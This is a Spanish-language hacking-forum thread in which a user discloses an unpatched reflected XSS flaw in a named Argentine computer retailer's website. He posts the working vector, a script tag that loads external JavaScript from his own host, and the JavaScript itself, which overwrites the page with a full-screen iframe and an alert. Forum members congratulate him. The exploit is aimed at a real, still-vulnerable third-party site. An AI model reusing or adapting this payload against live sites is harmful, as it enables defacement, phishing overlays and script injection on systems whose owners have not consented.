[XSS] www.aikencomputacion.com.ar

  • 4 Respuestas
  • 2208 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 197
  • Actividad:
    0%
  • Country: 00
  • Reputación 4
  • Security as art.
  • Twitter: @n0bodysec
    • Ver Perfil
    • Personal Website

[XSS] www.aikencomputacion.com.ar

  • en: Febrero 02, 2016, 07:43:08 pm
¡Hola, muy buenas!

Estaba buscando para comprarme una GeForce nueva, cuando me topé con mi viejo amigo Aiken Computación (Argentina :P), y como todo amante de la informática y vulnerabilidades a nivel web, sentí la obligación de probar un XSS en una variable GET (jaja).

Tuve la idea de incluir un script JavaScript externo para no líarme bypasseando el addslashes de la web.

(P.D.: Es una "fullscreen" iframe).
[*] Imagen:
Citar

[*] URL: You are not allowed to view links. Register or Login
[*] Vector utilizado: <script src=https://nobodytl.github.io/codes/js/iframe.js></script>
[*] Variables vulnerables: Todos los GET de la web.
[*] Reportado: SI (no reparado).

En definitiva, el vector final sería: You are not allowed to view links. Register or Login

El código del JavaScript lo dejo aquí debajo (aunque también es visible desde el link del vector) para demostrar como funciona.

Código: You are not allowed to view links. Register or Login
document.body.innerHTML = "<iframe style='position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' src=http://www.underc0de.org/></iframe>";
alert("Underc0de.org");

¡Saludos!
« Última modificación: Marzo 20, 2016, 02:33:27 pm por Nobody »
You are not allowed to view links. Register or Login

Desconectado MrR0bot

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[XSS] www.aikencomputacion.com.ar

  • en: Febrero 03, 2016, 11:10:04 am
Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.
"Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores"
 -- Kevin Mitnick

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1967
  • Actividad:
    33.33%
  • Country: es
  • Reputación 16
    • Ver Perfil

Re:[XSS] www.aikencomputacion.com.ar

  • en: Febrero 05, 2016, 08:02:58 am
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.


Desconectado ro0tmag

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • No sabía que era imposible
    • Ver Perfil

Re:[XSS] www.aikencomputacion.com.ar

  • en: Febrero 05, 2016, 09:24:38 am
 ;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud
You are not allowed to view links. Register or Login

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 197
  • Actividad:
    0%
  • Country: 00
  • Reputación 4
  • Security as art.
  • Twitter: @n0bodysec
    • Ver Perfil
    • Personal Website

Re:[XSS] www.aikencomputacion.com.ar

  • en: Febrero 05, 2016, 09:29:28 am
You are not allowed to view links. Register or Login

Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.
Gracias por avisar, voy a dejar de usar Google Drive como host jaja, imagen re subida.
¡Gracias!
(P.D.: Me daba error al modificar, una linda blank page :/ jaja).

You are not allowed to view links. Register or Login
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.
Si, ya se solucionó :-) Gracias por repararlo :P
Gracias, seguriás viendo aportes míos :P jaja

You are not allowed to view links. Register or Login
 ;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud
Jaja, no se como llegué a esto (? xD
Jaja gracias, ¡saludos!
« Última modificación: Febrero 22, 2017, 02:12:16 am por rollth »
You are not allowed to view links. Register or Login